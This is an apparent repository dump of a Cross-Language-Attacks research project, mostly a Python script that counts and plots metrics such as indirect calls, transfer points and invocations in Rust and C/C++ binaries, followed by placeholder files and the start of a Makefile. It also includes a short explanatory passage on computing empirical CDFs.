1351 |                         c_top_invos["third"] = tmp2
1352 | 
1353 |                     elif float(md[name]["num_invocations"]) > float(c_top_invos["third"]["num"]):
1354 |                         # Set the new leader
1355 |                         c_top_invos["third"]["name"] = str(name)
1356 |                         c_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1357 | 
1358 |                     ## Check top Transfer Points
1359 |                     if float(md[name]["num_transfer_points"]) > float(c_top_tps["first"]["num"]):
1360 |                         # Get tmps
1361 |                         tmp1 = {
1362 |                                 "name": c_top_tps["first"]["name"],
1363 |                                 "num": c_top_tps["first"]["num"],
1364 |                                 }
1365 |                         tmp2 = {
1366 |                                 "name": c_top_tps["second"]["name"],
1367 |                                 "num": c_top_tps["second"]["num"],
1368 |                                 }
1369 | 
1370 |                         # Set the new leader
1371 |                         c_top_tps["first"]["name"] = str(name)
1372 |                         c_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1373 | 
1374 |                         # Move down
1375 |                         c_top_tps["second"] = tmp1
1376 |                         c_top_tps["third"] = tmp2
1377 | 
1378 |                     elif float(md[name]["num_transfer_points"]) > float(c_top_tps["second"]["num"]):
1379 |                         # Get tmps
1380 |                         tmp2 = {
1381 |                                 "name": c_top_tps["second"]["name"],
1382 |                                 "num": c_top_tps["second"]["num"],
1383 |                                 }
1384 | 
1385 |                         # Set the new leader
1386 |                         c_top_tps["second"]["name"] = str(name)
1387 |                         c_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1388 | 
1389 |                         # Move down
1390 |                         c_top_tps["third"] = tmp2
1391 | 
1392 |                     elif float(md[name]["num_transfer_points"]) > float(c_top_tps["third"]["num"]):
1393 |                         # Set the new leader
1394 |                         c_top_tps["third"]["name"] = str(name)
1395 |                         c_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1396 | 
1397 |                     ## Check top Visitor Points
1398 |                     if float(md[name]["num_visitor_points"]) > float(c_top_vps["first"]["num"]):
1399 |                         # Get tmps
1400 |                         tmp1 = {
1401 |                                 "name": c_top_vps["first"]["name"],
1402 |                                 "num": c_top_vps["first"]["num"],
1403 |                                 }
1404 |                         tmp2 = {
1405 |                                 "name": c_top_vps["second"]["name"],
1406 |                                 "num": c_top_vps["second"]["num"],
1407 |                                 }
1408 | 
1409 |                         # Set the new leader
1410 |                         c_top_vps["first"]["name"] = str(name)
1411 |                         c_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1412 | 
1413 |                         # Move down
1414 |                         c_top_vps["second"] = tmp1
1415 |                         c_top_vps["third"] = tmp2
1416 | 
1417 |                     elif float(md[name]["num_visitor_points"]) > float(c_top_vps["second"]["num"]):
1418 |                         # Get tmps
1419 |                         tmp2 = {
1420 |                                 "name": c_top_vps["second"]["name"],
1421 |                                 "num": c_top_vps["second"]["num"],
1422 |                                 }
1423 | 
1424 |                         # Set the new leader
1425 |                         c_top_vps["second"]["name"] = str(name)
1426 |                         c_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1427 | 
1428 |                         # Move down
1429 |                         c_top_vps["third"] = tmp2
1430 | 
1431 |                     elif float(md[name]["num_visitor_points"]) > float(c_top_vps["third"]["num"]):
1432 |                         # Set the new leader
1433 |                         c_top_vps["third"]["name"] = str(name)
1434 |                         c_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1435 | 
1436 |                 except Exception as e:
1437 |                     print(e)
1438 | 
1439 |             try: 
1440 |                 both_indirs.append(float(md[name]["num_indirect_calls"]))
1441 |                 both_dynamics.append(float(md[name]["num_dynamic_calls"]))
1442 |                 both_cs.append(float(md[name]["num_call_sites"]))
1443 |                 both_tps.append(float(md[name]["num_transfer_points"]))
1444 |                 both_vps.append(float(md[name]["num_visitor_points"]))
1445 |                 both_invos.append(float(md[name]["num_invocations"]))
1446 | 
1447 |                 both_fns = both_fns + 1
1448 | 
1449 |                 both_total_indirs = both_total_indirs + float(md[name]["num_indirect_calls"])
1450 |                 both_total_dynamics = both_total_dynamics + float(md[name]["num_dynamic_calls"])
1451 |                 both_total_cs = both_total_cs + float(md[name]["num_call_sites"])
1452 |                 both_total_tps = both_total_tps + float(md[name]["num_transfer_points"])
1453 |                 both_total_vps = both_total_vps + float(md[name]["num_visitor_points"])
1454 |                 both_total_invos = both_total_invos + float(md[name]["num_invocations"])
1455 | 
1456 |                 ## Check top call sites
1457 |                 if float(md[name]["num_call_sites"]) > float(both_top_cs["first"]["num"]):
1458 |                     # Get tmps
1459 |                     # Copy the current first and second places so that
1460 |                     # each can move down one rank
1461 |                     tmp1 = {
1462 |                             "name": both_top_cs["first"]["name"],
1463 |                             "num": both_top_cs["first"]["num"],
1464 |                             }
1465 |                     tmp2 = {
1466 |                             "name": both_top_cs["second"]["name"],
1467 |                             "num": both_top_cs["second"]["num"],
1468 |                             }
1469 | 
1470 |                     # Set the new leader
1471 |                     both_top_cs["first"]["name"] = str(name)
1472 |                     both_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1473 | 
1474 |                     # Move down
1475 |                     both_top_cs["second"] = tmp1
1476 |                     both_top_cs["third"] = tmp2
1477 | 
1478 |                 elif float(md[name]["num_call_sites"]) > float(both_top_cs["second"]["num"]):
1479 |                     # Get tmps
1480 |                     # Copy the current runner-up so it can move down to third
1481 |                     tmp2 = {
1482 |                             "name": both_top_cs["second"]["name"],
1483 |                             "num": both_top_cs["second"]["num"],
1484 |                             }
1485 | 
1486 |                     # Set the new leader
1487 |                     both_top_cs["second"]["name"] = str(name)
1488 |                     both_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1489 | 
1490 |                     # Move down
1491 |                     both_top_cs["third"] = tmp2
1492 | 
1493 |                 elif float(md[name]["num_call_sites"]) > float(both_top_cs["third"]["num"]):
1494 |                     # Set the new leader
1495 |                     both_top_cs["third"]["name"] = str(name)
1496 |                     both_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1497 | 
1498 |                 ## Check top invocations 
1499 |                 if float(md[name]["num_invocations"]) > float(both_top_invos["first"]["num"]):
1500 |                     # Get tmps
1501 |                     tmp1 = {
1502 |                             "name": both_top_invos["first"]["name"],
1503 |                             "num": both_top_invos["first"]["num"],
1504 |                             }
1505 |                     tmp2 = {
1506 |                             "name": both_top_invos["second"]["name"],
1507 |                             "num": both_top_invos["second"]["num"],
1508 |                             }
1509 | 
1510 |                     # Set the new leader
1511 |                     both_top_invos["first"]["name"] = str(name)
1512 |                     both_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1513 | 
1514 |                     # Move down
1515 |                     both_top_invos["second"] = tmp1
1516 |                     both_top_invos["third"] = tmp2
1517 | 
1518 |                 elif float(md[name]["num_invocations"]) > float(both_top_invos["second"]["num"]):
1519 |                     # Get tmps
1520 |                     tmp2 = {
1521 |                             "name": both_top_invos["second"]["name"],
1522 |                             "num": both_top_invos["second"]["num"],
1523 |                             }
1524 | 
1525 |                     # Set the new leader
1526 |                     both_top_invos["second"]["name"] = str(name)
1527 |                     both_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1528 | 
1529 |                     # Move down
1530 |                     both_top_invos["third"] = tmp2
1531 | 
1532 |                 elif float(md[name]["num_invocations"]) > float(both_top_invos["third"]["num"]):
1533 |                     # Set the new leader
1534 |                     both_top_invos["third"]["name"] = str(name)
1535 |                     both_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1536 | 
1537 |                 ## Check top Transfer Points
1538 |                 if float(md[name]["num_transfer_points"]) > float(both_top_tps["first"]["num"]):
1539 |                     # Get tmps
1540 |                     tmp1 = {
1541 |                             "name": both_top_tps["first"]["name"],
1542 |                             "num": both_top_tps["first"]["num"],
1543 |                             }
1544 |                     tmp2 = {
1545 |                             "name": both_top_tps["second"]["name"],
1546 |                             "num": both_top_tps["second"]["num"],
1547 |                             }
1548 | 
1549 |                     # Set the new leader
1550 |                     both_top_tps["first"]["name"] = str(name)
1551 |                     both_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1552 | 
1553 |                     # Move down
1554 |                     both_top_tps["second"] = tmp1
1555 |                     both_top_tps["third"] = tmp2
1556 | 
1557 |                 elif float(md[name]["num_transfer_points"]) > float(both_top_tps["second"]["num"]):
1558 |                     # Get tmps
1559 |                     tmp2 = {
1560 |                             "name": both_top_tps["second"]["name"],
1561 |                             "num": both_top_tps["second"]["num"],
1562 |                             }
1563 | 
1564 |                     # Set the new leader
1565 |                     both_top_tps["second"]["name"] = str(name)
1566 |                     both_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1567 | 
1568 |                     # Move down
1569 |                     both_top_tps["third"] = tmp2
1570 | 
1571 |                 elif float(md[name]["num_transfer_points"]) > float(both_top_tps["third"]["num"]):
1572 |                     # Set the new leader
1573 |                     both_top_tps["third"]["name"] = str(name)
1574 |                     both_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1575 | 
1576 |                 ## Check top Visitor Points
1577 |                 if float(md[name]["num_visitor_points"]) > float(both_top_vps["first"]["num"]):
1578 |                     # Get tmps
1579 |                     tmp1 = {
1580 |                             "name": both_top_vps["first"]["name"],
1581 |                             "num": both_top_vps["first"]["num"],
1582 |                             }
1583 |                     tmp2 = {
1584 |                             "name": both_top_vps["second"]["name"],
1585 |                             "num": both_top_vps["second"]["num"],
1586 |                             }
1587 | 
1588 |                     # Set the new leader
1589 |                     both_top_vps["first"]["name"] = str(name)
1590 |                     both_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1591 | 
1592 |                     # Move down
1593 |                     both_top_vps["second"] = tmp1
1594 |                     both_top_vps["third"] = tmp2
1595 | 
1596 |                 elif float(md[name]["num_visitor_points"]) > float(both_top_vps["second"]["num"]):
1597 |                     # Get tmps
1598 |                     tmp2 = {
1599 |                             "name": both_top_vps["second"]["name"],
1600 |                             "num": both_top_vps["second"]["num"],
1601 |                             }
1602 | 
1603 |                     # Set the new leader
1604 |                     both_top_vps["second"]["name"] = str(name)
1605 |                     both_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1606 | 
1607 |                     # Move down
1608 |                     both_top_vps["third"] = tmp2
1609 | 
1610 |                 elif float(md[name]["num_visitor_points"]) > float(both_top_vps["third"]["num"]):
1611 |                     # Set the new leader
1612 |                     both_top_vps["third"]["name"] = str(name)
1613 |                     both_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1614 | 
1615 |             except Exception as e:
1616 |                 print(e)
1617 | 
1618 |         ### Print table metrics
1619 |         ## Number of Functions
1620 |         print("Total functions: ")
1621 |         print("Rust: " + str(rust_fns))
1622 |         print("C/C++: " + str(c_fns))
1623 |         print("Both: " + str(both_fns))
1624 | 
1625 |         ## Number of Indirections
1626 |         print("Total Indirect Calls: ")
1627 |         print("Rust: " + str(rust_total_indirs))
1628 |         print("C/C++: " + str(c_total_indirs))
1629 |         print("Both: " + str(both_total_indirs))
1630 | 
1631 |         ## Number of Dynamic Calls
1632 |         print("Total Dynamic Calls: ")
1633 |         print("Rust: " + str(rust_total_dynamics))
1634 |         print("C/C++: " + str(c_total_dynamics))
1635 |         print("Both: " + str(both_total_dynamics))
1636 | 
1637 |         ## Number of Call Sites
1638 |         print("Total Call Sites: ")
1639 |         print("Rust: " + str(rust_total_cs))
1640 |         print("C/C++: " + str(c_total_cs))
1641 |         print("Both: " + str(both_total_cs))
1642 | 
1643 |         ## Number of Transfer Points 
1644 |         print("Total Transfer Points: ")
1645 |         print("Rust: " + str(rust_total_tps))
1646 |         print("C/C++: " + str(c_total_tps))
1647 |         print("Both: " + str(both_total_tps))
1648 | 
1649 |         ## Number of Visitor Points 
1650 |         print("Total Visitor Points: ")
1651 |         print("Rust: " + str(rust_total_vps))
1652 |         print("C/C++: " + str(c_total_vps))
1653 |         print("Both: " + str(both_total_vps))
1654 | 
1655 |         ## Number of Invocations 
1656 |         print("Total Invocations: ")
1657 |         print("Rust: " + str(rust_total_invos))
1658 |         print("C/C++: " + str(c_total_invos))
1659 |         print("Both: " + str(both_total_invos))
1660 | 
1661 |         ## Number of Rust closures 
1662 |         print("Total Closures: ")
1663 |         print("Rust: " + str(rust_closures))
1664 | 
1665 |         ## Number of Rust monomorphized functions 
1666 |         print("Total Monomorphized Functions: ")
1667 |         print("Rust: " + str(rust_monos))
1668 | 
1669 |         ### Print Top contenders
1670 |         ## Top Call Sites
1671 |         print("Top Call Sites:")
1672 |         print("Both: " + str(both_top_cs))
1673 |         print("Rust: " + str(rust_top_cs))
1674 |         print("C/C++: " + str(c_top_cs))
1675 | 
1676 |         ## Top Invocations 
1677 |         print("Top Invocations:")
1678 |         print("Both: " + str(both_top_invos))
1679 |         print("Rust: " + str(rust_top_invos))
1680 |         print("C/C++: " + str(c_top_invos))
1681 | 
1682 |         ## Top Transfer Points 
1683 |         print("Top Transfer Points:")
1684 |         print("Both: " + str(both_top_tps))
1685 |         print("Rust: " + str(rust_top_tps))
1686 |         print("C/C++: " + str(c_top_tps))
1687 | 
1688 |         ## Top Visitor Points 
1689 |         print("Top Visitor Points:")
1690 |         print("Both: " + str(both_top_vps))
1691 |         print("Rust: " + str(rust_top_vps))
1692 |         print("C/C++: " + str(c_top_vps))
1693 | 
1694 |         ### Make a CDF for number of indirect calls
1695 |         rust_x = np.sort(np.array(rust_indirs))
1696 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1697 | 
1698 |         c_x = np.sort(np.array(c_indirs))
1699 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1700 | 
1701 |         both_x = np.sort(np.array(both_indirs))
1702 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1703 | 
1704 |         print("Generating CDF for indirect function calls...")
1705 |         print(both_y)
1706 |         cdf_plt = plt.figure()
1707 | 
1708 |         # Graph labels
1709 |         plt.title("Number of Indirect Function Calls")
1710 |         plt.xlabel("Number of Indirect Function Calls")
1711 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1712 | 
1713 |         #plt.axis([0, max(both_x), 0, 1])
1714 |         plt.axis([0, 10, 0.9, 1])
1715 | 
1716 |         # Grayscale
1717 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/10000000)
1718 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1719 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/10000000)
1720 | 
1721 |         # Color
1722 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/10000000)
1723 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1724 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/10000000)
1725 | 
1726 |         # Generate and save graph
1727 |         #plt.grid(True)
1728 |         plt.grid(True, color='0.45')
1729 |         plt.plot()
1730 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1731 |         print("Saving indirs...")
1732 |         cdf_plt.savefig("output/graphs/indirs.pdf", bbox_inches='tight')
1733 |         plt.show()
1734 | 
1735 | 
1736 |         ### Make a CDF for number of dynamic calls
1737 |         rust_x = np.sort(np.array(rust_dynamics))
1738 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1739 | 
1740 |         c_x = np.sort(np.array(c_dynamics))
1741 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1742 | 
1743 |         both_x = np.sort(np.array(both_dynamics))
1744 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1745 | 
1746 |         print("Generating CDF for dynamic function calls...")
1747 |         cdf_plt = plt.figure()
1748 | 
1749 |         # Graph labels
1750 |         plt.title("Number of Dynamic Function Calls")
1751 |         plt.xlabel("Number of Dynamic Function Calls")
1752 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1753 | 
1754 |         #plt.axis([0, max(both_x), 0.9, 1])
1755 |         plt.axis([0, 20, 0.85, 1])
1756 | 
1757 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/5000000)
1758 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1759 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/5000000)
1760 | 
1761 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/5000000)
1762 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1763 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/5000000)
1764 | 
1765 |         # Generate and save graph
1766 |         #plt.grid(True)
1767 |         plt.grid(True, color='0.45')
1768 |         plt.plot()
1769 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1770 |         print("Saving dynamics...")
1771 |         cdf_plt.savefig("output/graphs/dynamics.pdf", bbox_inches='tight')
1772 | 
1773 |         ### Make a CDF for number of call sites
1774 |         rust_x = np.sort(np.array(rust_cs))
1775 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1776 | 
1777 |         c_x = np.sort(np.array(c_cs))
1778 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1779 | 
1780 |         both_x = np.sort(np.array(both_cs))
1781 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1782 | 
1783 |         print("Generating CDF for number of call sites...")
1784 |         cdf_plt = plt.figure()
1785 | 
1786 |         # Graph labels
1787 |         plt.title("Number of Call Sites")
1788 |         plt.xlabel("Number of Call Sites")
1789 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1790 | 
1791 |         #plt.axis([0, max(both_x), 0.9, 1])
1792 |         plt.axis([0, 50, 0.8, 1])
1793 | 
1794 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/10000000)
1795 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1796 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/10000000)
1797 | 
1798 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/10000000)
1799 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1800 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/10000000)
1801 | 
1802 |         # Generate and save graph
1803 |         #plt.grid(True)
1804 |         plt.grid(True, color='0.45')
1805 |         plt.plot()
1806 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1807 |         print("Saving calls...")
1808 |         cdf_plt.savefig("output/graphs/calls.pdf", bbox_inches='tight')
1809 | 
1810 |         ### Make a CDF for number of transfer points
1811 |         rust_x = np.sort(np.array(rust_tps))
1812 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1813 | 
1814 |         c_x = np.sort(np.array(c_tps))
1815 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1816 | 
1817 |         both_x = np.sort(np.array(both_tps))
1818 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1819 | 
1820 |         print("Generating CDF for number of transfer points...")
1821 |         cdf_plt = plt.figure()
1822 | 
1823 |         # Graph labels
1824 |         plt.title("Number of Transfer Points")
1825 |         plt.xlabel("Number of Transfer Points")
1826 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1827 | 
1828 |         #plt.axis([0, max(both_x), 0.9, 1])
1829 |         plt.axis([0, 20, 0.9, 1])
1830 | 
1831 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/5000000)
1832 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1833 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/5000000)
1834 | 
1835 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/5000000)
1836 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1837 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/5000000)
1838 | 
1839 |         # Generate and save graph
1840 |         #plt.grid(True)
1841 |         plt.grid(True, color='0.45')
1842 |         plt.plot()
1843 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1844 |         print("Saving tps...")
1845 |         cdf_plt.savefig("output/graphs/tps.pdf", bbox_inches='tight')
1846 | 
1847 |         ### Make a CDF for number of visitor points
1848 |         #print("rust_vps")
1849 |         #print(rust_vps)
1850 |         #print("c_vps")
1851 |         #print(c_vps)
1852 |         #print("both_vps")
1853 |         #print(both_vps)
1854 |         rust_x = np.sort(np.array(rust_vps))
1855 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1856 | 
1857 |         c_x = np.sort(np.array(c_vps))
1858 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1859 | 
1860 |         both_x = np.sort(np.array(both_vps))
1861 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1862 | 
1863 |         print("Generating CDF for number of visitor points...")
1864 |         cdf_plt = plt.figure()
1865 | 
1866 |         # Graph labels
1867 |         plt.title("Number of Visitor Points")
1868 |         plt.xlabel("Number of Visitor Points")
1869 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1870 | 
1871 |         #plt.axis([0, max(both_x), 0.9, 1])
1872 |         plt.axis([0, 10, 0.9, 1])
1873 | 
1874 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/500000)
1875 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1876 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/500000)
1877 | 
1878 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/250000)
1879 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1880 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/250000)
1881 | 
1882 |         # Generate and save graph
1883 |         #plt.grid(True)
1884 |         plt.grid(True, color='0.45')
1885 |         plt.plot()
1886 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1887 |         print("Saving vps...")
1888 |         cdf_plt.savefig("output/graphs/vps.pdf", bbox_inches='tight')
1889 | 
1890 |         ### Make a CDF for number of invocations 
1891 |         #print("rust_invos")
1892 |         #print(rust_invos)
1893 | 
1894 |         rust_x = np.sort(np.array(rust_invos))
1895 |         rust_y = np.arange(1, len(rust_x)+1)/len(rust_x)
1896 | 
1897 |         #print("c_invos")
1898 |         #print(c_invos)
1899 | 
1900 |         c_x = np.sort(np.array(c_invos))
1901 |         c_y = np.arange(1, len(c_x)+1)/len(c_x)
1902 | 
1903 |         #print("both_invos")
1904 |         #print(both_invos)
1905 | 
1906 |         both_x = np.sort(np.array(both_invos))
1907 |         both_y = np.arange(1, len(both_x)+1)/len(both_x)
1908 | 
1909 |         print("Generating CDF for number of invocations...")
1910 |         cdf_plt = plt.figure()
1911 | 
1912 |         # Graph labels
1913 |         plt.title("Number of Invocations")
1914 |         plt.xlabel("Number of Invocations")
1915 |         plt.ylabel("Cumulative Distribution Function (CDF)")
1916 | 
1917 |         #plt.axis([0, max(both_x), 0.9, 1])
1918 |         plt.axis([0, 30, 0.8, 1])
1919 | 
1920 |         #plt.plot(both_x, both_y, label='All', marker='^', color='0.6', linestyle='-', markevery=len(both_x)/1000000)
1921 |         #plt.plot(rust_x, rust_y, label='Rust', marker='o', color='0.35', linestyle='-', markevery=len(rust_x)/200000)
1922 |         #plt.plot(c_x, c_y, label='C/C++', marker='s', color='0', linestyle='-', markevery=len(c_x)/1000000)
1923 | 
1924 |         plt.plot(both_x, both_y, label='All', marker='^', color='0', linestyle='-', markevery=len(both_x)/750000)
1925 |         plt.plot(rust_x, rust_y, label='Rust', marker='o', color='red', linestyle='-', markevery=len(rust_x)/200000)
1926 |         plt.plot(c_x, c_y, label='C/C++', marker='s', color='blue', linestyle='-', markevery=len(c_x)/750000)
1927 | 
1928 |         # Generate and save graph
1929 |         #plt.grid(True)
1930 |         plt.grid(True, color='0.45')
1931 |         plt.plot()
1932 |         plt.legend(loc='upper center',bbox_to_anchor=(0.5, -0.15),shadow=True, ncol=3)
1933 |         print("Saving invos...")
1934 |         cdf_plt.savefig("output/graphs/invos.pdf", bbox_inches='tight')
1935 | 
1936 | if __name__ == "__main__":
1937 | 
1938 |     # Version that takes a file of binaries
1939 |     parser = ArgumentParser()
1940 |     parser.add_argument("bin_paths", type=str, help="""
1941 |     Path of file that contains list of binaries to generate metrics for 
1942 |     """)
1943 |     args = parser.parse_args()
1944 | 
1945 |     # Find each relevant binary
1946 |     # TODO: call find_elf.sh from python
1947 | 
1948 |     # For each elf, create a json file of function metadata 
1949 |     elf_reader(args.bin_paths)
1950 | 
1951 |     # Combine each elf json file into a single json file of function metadata 
1952 |     combine_elf_results(args.bin_paths)
1953 | 
1954 |     # For each objdump, create a json file of function metadata 
1955 |     obj_reader(args.bin_paths)
1956 | 
1957 |     # Combine each obj json file into a single json file of function metadata 
1958 |     combine_obj_results(args.bin_paths)
1959 | 
1960 |     # Combine elf and obj json metadata into one json file of function metadata
1961 |     combine_elf_and_obj_results()
1962 | 
1963 |     # Use call sites in function metadata to find transfer and visitor points and save 
1964 |     get_transfer_points()
1965 | 
1966 |     # Use call sites in function metadata to find invocations  
1967 |     get_invocation_points()
1968 | 
1969 |     # Make graphs from metadata
1970 |     generate_cdfs()
1971 | 
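Each CDF block in the plotting code above follows the same pattern: sort the per-function counts, then pair the i-th smallest value with the fraction i/n. The sketch below shows that computation without NumPy, using plain lists. The helper names `empirical_cdf` and `fraction_at_most` are hypothetical and not part of fn_metrics.py, and the sample counts are made up for illustration.

```python
from bisect import bisect_right


def empirical_cdf(values):
    """Return (xs, ys): the sorted values and their cumulative fractions.

    Mirrors the np.sort(...) and np.arange(1, n + 1) / n pattern used in the
    plotting code, but with plain lists so it runs without NumPy.
    """
    xs = sorted(values)
    n = len(xs)
    ys = [(i + 1) / n for i in range(n)]
    return xs, ys


def fraction_at_most(values, threshold):
    """Fraction of samples that are <= threshold (the CDF read at threshold)."""
    xs = sorted(values)
    if not xs:
        raise ValueError("need at least one sample")
    return bisect_right(xs, threshold) / len(xs)


if __name__ == "__main__":
    # Hypothetical per-function counts; most functions have none.
    sample_counts = [0, 0, 0, 1, 0, 2, 0, 0, 7, 0]
    xs, ys = empirical_cdf(sample_counts)
    print(xs)
    print(ys)
    print(fraction_at_most(sample_counts, 1))
```

Reading the CDF at a small threshold shows why a plot might zoom its y-axis into the upper range, as the `plt.axis` calls above do: when most functions have a count of zero or one, the curve is already close to 1 near the left edge.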


--------------------------------------------------------------------------------
/cla-metrics/input/elfs/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/input/elfs/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/input/objdumps/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/input/objdumps/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/input/source-info.json:
--------------------------------------------------------------------------------
1 | {
2 |     "rust": [],
3 |     "c": []
4 | }
5 | 


--------------------------------------------------------------------------------
/cla-metrics/output/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/.DS_Store


--------------------------------------------------------------------------------
/cla-metrics/output/elf-results/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/elf-results/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/output/graphs/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/graphs/.placeholder


--------------------------------------------------------------------------------
/cla-metrics/output/obj-results/.placeholder:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mit-ll/Cross-Language-Attacks/77532b04006dd4e4de017f3bf502751ae47f3722/cla-metrics/output/obj-results/.placeholder


--------------------------------------------------------------------------------
/go-cla-examples/Makefile:
--------------------------------------------------------------------------------
 1 | DIR=$(dir $(realpath $(firstword $(MAKEFILE_LIST))))
 2 | 
 3 | all: go
 4 | 
 5 | dynamic-c:
 6 | 	#clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c -fsanitize=cfi -flto -fvisibility=hidden 
 7 | 	#clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o -fsanitize=cfi -flto -fvisibility=hidden
 8 | 	clang -fPIC -c -o $(DIR)/src/init/init.o $(DIR)src/init/init.c 
 9 | 	clang -fPIC -shared -o $(DIR)src/init/libinit.so $(DIR)src/init/init.o 
10 | 
11 | static-c:
